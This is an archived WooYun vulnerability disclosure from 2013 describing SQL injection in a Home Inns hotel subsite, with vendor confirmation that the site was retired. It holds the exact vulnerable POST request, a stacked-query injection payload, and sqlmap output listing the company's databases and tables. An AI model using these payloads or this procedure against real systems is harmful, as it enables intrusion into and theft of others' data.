当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2013-043355

漏洞标题:如家某分站SQL注入漏洞

相关厂商:如家酒店集团

漏洞作者: Mutoubug

提交时间:2013-11-19 16:49

修复时间:2014-01-03 16:50

公开时间:2014-01-03 16:50

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:15

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2013-11-19: 细节已通知厂商并且等待厂商处理中
2013-11-19: 厂商已经确认,细节仅向厂商公开
2013-11-29: 细节向核心白帽子及相关领域专家公开
2013-12-09: 细节向普通白帽子公开
2013-12-19: 细节向实习白帽子公开
2014-01-03: 细节向公众公开

简要描述:

会重复吗?

详细说明:

http://old.homeinns.com
在这个网站中,本来找到洞,准备提交了,悲剧的是网站挂了,白帽子们太给力。。
拖到现在再交。。
大概就是一个查询框:

rujia.jpg


虽然在页面中有限制输入,但是还是可以抓包来跑。结果是存在注入点:
http://old.homeinns.com/member/registration_e.aspx (POST)
btncContinueReg=4111111111111111&btnReturn=1&btnSubmit=1&ChbProof=on&Citys$txtFCity=123*&ddlCertificate=JID&Gender=RadioBtnM&txtCertificateNo=1&txtCode=94102&[email protected]&txtMobile=987-65-4329&txtName=krmdttxk&__EVENTARGUMENT=&__EVENTTARGET=&__VIEWSTATE=/wEPDwUKLTU5Mjc5OTA1Mg9kFgICAw9kFgICAQ9kFgJmDxYCHglpbm5lcmh0bWwFBGNsdWJkGAEFHl9fQ29udHJvbHNSZXF1aXJlUG9zdEJhY2tLZXlfXxYEBQlSYWRpb0J0bk0FCVJhZGlvQnRuVwUJUmFkaW9CdG5XBQhDaGJQcm9vZpgnCYybRGztPFTQQAwkDGzOm7GO
结果:
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: (custom) POST
Parameter: #1*
Type: boolean-based blind
Title: Microsoft SQL Server/Sybase stacked conditional-error blind queries
Payload: btncContinueReg=4111111111111111&btnReturn=1&btnSubmit=1&ChbProof=on&Citys$txtFCity=123'); IF(7173=7173) SELECT 7173 ELSE DROP FUNCTION pjwB--&ddlCertificate=JID&Gender=RadioBtnM&txtCertificateNo=1&txtCode=94102&[email protected]&txtMobile=987-65-4329&txtName=krmdttxk&__EVENTARGUMENT=&__EVENTTARGET=&__VIEWSTATE=/wEPDwUKLTU5Mjc5OTA1Mg9kFgICAw9kFgICAQ9kFgJmDxYCHglpbm5lcmh0bWwFBGNsdWJkGAEFHl9fQ29udHJvbHNSZXF1aXJlUG9zdEJhY2tLZXlfXxYEBQlSYWRpb0J0bk0FCVJhZGlvQnRuVwUJUmFkaW9CdG5XBQhDaGJQcm9vZpgnCYybRGztPFTQQAwkDGzOm7GO
---
web server operating system: Windows 2003
web application technology: ASP.NET, Microsoft IIS 6.0, ASP.NET 2.0.50727
back-end DBMS: Microsoft SQL Server 2008
available databases [23]:
[*] CRS
[*] CRS_HistoryData
[*] Crs_OrderNo_Builder
[*] HCS
[*] HHotel
[*] homeinns
[*] Hotel
[*] ICRSDB
[*] IVRData
[*] mapbar
[*] master
[*] MDEC
[*] model
[*] MotelHCS
[*] msdb
[*] MT_AgentDB
[*] MT_CRS
[*] MT_Rujia_Transmit
[*] OTA
[*] profiler
[*] Rujia_Transmit
[*] tempdb
[*] WebPromotron
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: (custom) POST
Parameter: #1*
Type: boolean-based blind
Title: Microsoft SQL Server/Sybase stacked conditional-error blind queries
Payload: btncContinueReg=4111111111111111&btnReturn=1&btnSubmit=1&ChbProof=on&Citys$txtFCity=123'); IF(7173=7173) SELECT 7173 ELSE DROP FUNCTION pjwB--&ddlCertificate=JID&Gender=RadioBtnM&txtCertificateNo=1&txtCode=94102&[email protected]&txtMobile=987-65-4329&txtName=krmdttxk&__EVENTARGUMENT=&__EVENTTARGET=&__VIEWSTATE=/wEPDwUKLTU5Mjc5OTA1Mg9kFgICAw9kFgICAQ9kFgJmDxYCHglpbm5lcmh0bWwFBGNsdWJkGAEFHl9fQ29udHJvbHNSZXF1aXJlUG9zdEJhY2tLZXlfXxYEBQlSYWRpb0J0bk0FCVJhZGlvQnRuVwUJUmFkaW9CdG5XBQhDaGJQcm9vZpgnCYybRGztPFTQQAwkDGzOm7GO
---
web server operating system: Windows 2003
web application technology: ASP.NET, Microsoft IIS 6.0, ASP.NET 2.0.50727
back-end DBMS: Microsoft SQL Server 2008
Database: homeinns
[45 tables]
+---------------------------+
| PromotionLink |
| VIEW_AWARD_CATE |
| VIEW_Customer_List |
| VIEW_PROMOTION_THEME_CATE |
| VIEW_PROVICE_CITY |
| VIEW_PService_Cate |
| VIEW_Partner_Cate |
| ad |
| appliction |
| area |
| award_category |
| city |
| email |
| flash_new |
| flash_pic |
| home_award |
| home_awardTest |
| home_contact |
| home_customer |
| home_customer_list |
| home_customer_plan |
| home_event |
| home_hotelsort |
| home_intro |
| home_job |
| home_module |
| home_news |
| home_pService |
| home_partner |
| home_promotion |
| home_user |
| home_user_role |
| homeintr |
| insideflashimg |
| news_flash |
| partner_category |
| promotion_category |
| promotion_theme |
| province |
| pservice_category |
| question |
| suggest |
| survey |
| survey_cat |
| survey_member |
+---------------------------+
再跑第二表的时候服务器就挂了,应该不关我的事吧。。

漏洞证明:

sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: (custom) POST
Parameter: #1*
Type: boolean-based blind
Title: Microsoft SQL Server/Sybase stacked conditional-error blind queries
Payload: btncContinueReg=4111111111111111&btnReturn=1&btnSubmit=1&ChbProof=on&Citys$txtFCity=123'); IF(7173=7173) SELECT 7173 ELSE DROP FUNCTION pjwB--&ddlCertificate=JID&Gender=RadioBtnM&txtCertificateNo=1&txtCode=94102&[email protected]&txtMobile=987-65-4329&txtName=krmdttxk&__EVENTARGUMENT=&__EVENTTARGET=&__VIEWSTATE=/wEPDwUKLTU5Mjc5OTA1Mg9kFgICAw9kFgICAQ9kFgJmDxYCHglpbm5lcmh0bWwFBGNsdWJkGAEFHl9fQ29udHJvbHNSZXF1aXJlUG9zdEJhY2tLZXlfXxYEBQlSYWRpb0J0bk0FCVJhZGlvQnRuVwUJUmFkaW9CdG5XBQhDaGJQcm9vZpgnCYybRGztPFTQQAwkDGzOm7GO
---
web server operating system: Windows 2003
web application technology: ASP.NET, Microsoft IIS 6.0, ASP.NET 2.0.50727
back-end DBMS: Microsoft SQL Server 2008
available databases [23]:
[*] CRS
[*] CRS_HistoryData
[*] Crs_OrderNo_Builder
[*] HCS
[*] HHotel
[*] homeinns
[*] Hotel
[*] ICRSDB
[*] IVRData
[*] mapbar
[*] master
[*] MDEC
[*] model
[*] MotelHCS
[*] msdb
[*] MT_AgentDB
[*] MT_CRS
[*] MT_Rujia_Transmit
[*] OTA
[*] profiler
[*] Rujia_Transmit
[*] tempdb
[*] WebPromotron
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: (custom) POST
Parameter: #1*
Type: boolean-based blind
Title: Microsoft SQL Server/Sybase stacked conditional-error blind queries
Payload: btncContinueReg=4111111111111111&btnReturn=1&btnSubmit=1&ChbProof=on&Citys$txtFCity=123'); IF(7173=7173) SELECT 7173 ELSE DROP FUNCTION pjwB--&ddlCertificate=JID&Gender=RadioBtnM&txtCertificateNo=1&txtCode=94102&[email protected]&txtMobile=987-65-4329&txtName=krmdttxk&__EVENTARGUMENT=&__EVENTTARGET=&__VIEWSTATE=/wEPDwUKLTU5Mjc5OTA1Mg9kFgICAw9kFgICAQ9kFgJmDxYCHglpbm5lcmh0bWwFBGNsdWJkGAEFHl9fQ29udHJvbHNSZXF1aXJlUG9zdEJhY2tLZXlfXxYEBQlSYWRpb0J0bk0FCVJhZGlvQnRuVwUJUmFkaW9CdG5XBQhDaGJQcm9vZpgnCYybRGztPFTQQAwkDGzOm7GO
---
web server operating system: Windows 2003
web application technology: ASP.NET, Microsoft IIS 6.0, ASP.NET 2.0.50727
back-end DBMS: Microsoft SQL Server 2008
Database: homeinns
[45 tables]
+---------------------------+
| PromotionLink |
| VIEW_AWARD_CATE |
| VIEW_Customer_List |
| VIEW_PROMOTION_THEME_CATE |
| VIEW_PROVICE_CITY |
| VIEW_PService_Cate |
| VIEW_Partner_Cate |
| ad |
| appliction |
| area |
| award_category |
| city |
| email |
| flash_new |
| flash_pic |
| home_award |
| home_awardTest |
| home_contact |
| home_customer |
| home_customer_list |
| home_customer_plan |
| home_event |
| home_hotelsort |
| home_intro |
| home_job |
| home_module |
| home_news |
| home_pService |
| home_partner |
| home_promotion |
| home_user |
| home_user_role |
| homeintr |
| insideflashimg |
| news_flash |
| partner_category |
| promotion_category |
| promotion_theme |
| province |
| pservice_category |
| question |
| suggest |
| survey |
| survey_cat |
| survey_member |
+---------------------------+

修复方案:

1.过滤搜索参数
2.重启服务器。。=.=
3.会重复吗?

版权声明:转载请注明来源 Mutoubug@乌云


漏洞回应

厂商回应:

危害等级:中

漏洞Rank:5

确认时间:2013-11-19 17:20

厂商回复:

感谢关注!此站已停用!

最新状态:

暂无